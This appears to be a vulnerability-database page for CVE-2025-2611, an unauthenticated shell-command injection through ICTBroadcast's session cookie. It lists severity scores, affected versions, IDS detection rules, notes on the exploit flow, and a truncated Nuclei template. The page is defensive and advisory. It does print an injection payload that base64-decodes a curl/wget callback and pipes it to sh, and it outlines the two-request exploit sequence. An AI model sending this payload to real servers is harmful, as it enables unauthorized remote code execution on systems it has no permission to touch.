CVE-2025-2611
published 2025-08-05CVE-2025-2611: The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that…
PriorityP185critical9.3CVSS 4.0
AVNACLATNPRNUINVCHVILVALSCHSIHSAHEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
6.08%
92.5th percentile
The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling.
Versions 7.4 and below are known to be vulnerable.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ict_innovations | ictbroadcast | <= 7.4 | — |
Detection & IOCsextracted from sources · hover to see the quote
command`echo${IFS}{{base64('curl -s {{interactsh-url}} || wget -qO- {{interactsh-url}}')}}|base64${IFS}-d|sh`↗
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ICTBroadcast Command Injection (CVE-2025-2611)"; flow:established,to_server; http.cookie; content:"BROADCAST|3d|"; pcre:"/^[^\x3b]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,www.vulncheck.com/blog/ictbroadcast-kev; reference:cve,2025-2611; classtype:web-application-attack; sid:2065259; rev:1;)
- →Exploit targets GET /login.php with a malicious session cookie value containing shell metacharacters (backtick, pipe, semicolon, dollar sign, newline) in the cookie named by the server-set cookie name (observed as BROADCAST=). ↗
- →Detect shell injection characters in the BROADCAST cookie: semicolons (;/%3B), newlines (\x0a/%0A), backticks (`/%60), pipes (|/%7C), or dollar signs ($/%24) using the Emerging Threats PCRE pattern.
- →Shodan query for exposed ICTBroadcast instances to identify attack surface.
- →The exploit is unauthenticated — no prior session or credentials are required. Exploitation is confirmed by an out-of-band DNS callback (interactsh), so monitor for unexpected DNS/HTTP callbacks from web server processes.
- →The exploit first probes GET /login.php to harvest the server-issued cookie name, then replays the same endpoint with the injected cookie. Two sequential requests to /login.php from the same source with differing cookie values is a strong behavioral signal.
- ·Versions 7.4 and below are confirmed vulnerable; the exact cookie name harvested from the server may vary, but the ET rule anchors on the 'BROADCAST=' prefix.
CVSS provenance
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
vendor_redhat5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3h67-687r-7fpc: The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session coo
ghsa_unreviewed·2025-08-05
CVE-2025-2611 [CRITICAL] CWE-20 GHSA-3h67-687r-7fpc: The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session coo
The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling.
Versions 7.4 and below are known to be vulnerable.
VulnCheck
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2025·CVSS 9.3
CVE-2025-2611 [CRITICAL] Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling.
Versions 7.4 and below are known to be vulnerable.
Affected: ICTBroadcast ICTBroadcast
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-2611&date=2025-10-12; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2025-2611&date=202
Suricata
ET WEB_SPECIFIC_APPS ICTBroadcast Command Injection (CVE-2025-2611)
suricata·2025-10-21·CVSS 9.3
CVE-2025-2611 [CRITICAL] ET WEB_SPECIFIC_APPS ICTBroadcast Command Injection (CVE-2025-2611)
ET WEB_SPECIFIC_APPS ICTBroadcast Command Injection (CVE-2025-2611)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ICTBroadcast Command Injection (CVE-2025-2611)"; flow:established,to_server; http.cookie; content:"BROADCAST|3d|"; pcre:"/^[^\x3b]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,www.vulncheck.com/blog/ictbroadcast-kev; reference:cve,2025-2611; classtype:web-application-attack; sid:2065259; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_10_21, cve CVE_2025_2611, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_10_21, mitre_tactic_id TA0001, mi
Metasploit
ICTBroadcast Unauthenticated Remote Code Execution
metasploit
ICTBroadcast Unauthenticated Remote Code Execution
ICTBroadcast Unauthenticated Remote Code Execution
This module exploits an unauthenticated remote code execution (RCE) vulnerability in ICTBroadcast. The vulnerability exists in the way session cookies are handled and processed, allowing an attacker to inject arbitrary system commands.
Nuclei
ICTBroadcast - Command Injection
nuclei·CVSS 9.3
CVE-2025-2611 [CRITICAL] ICTBroadcast - Command Injection
ICTBroadcast - Command Injection
The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling. Versions 7.4 and below are known to be vulnerable.
Template:
id: CVE-2025-2611
info:
name: ICTBroadcast - Command Injection
author: Chocapikk
severity: critical
description: |
The ICTBroadcast application unsafely passes session cookie data to shell processing, allowing an attacker to inject shell commands into a session cookie that get executed on the server. This results in unauthenticated remote code execution in the session handling. Versions 7.4 and below are known to be vulnerable.
impa
2025-08-05
Published
Exploited in the wild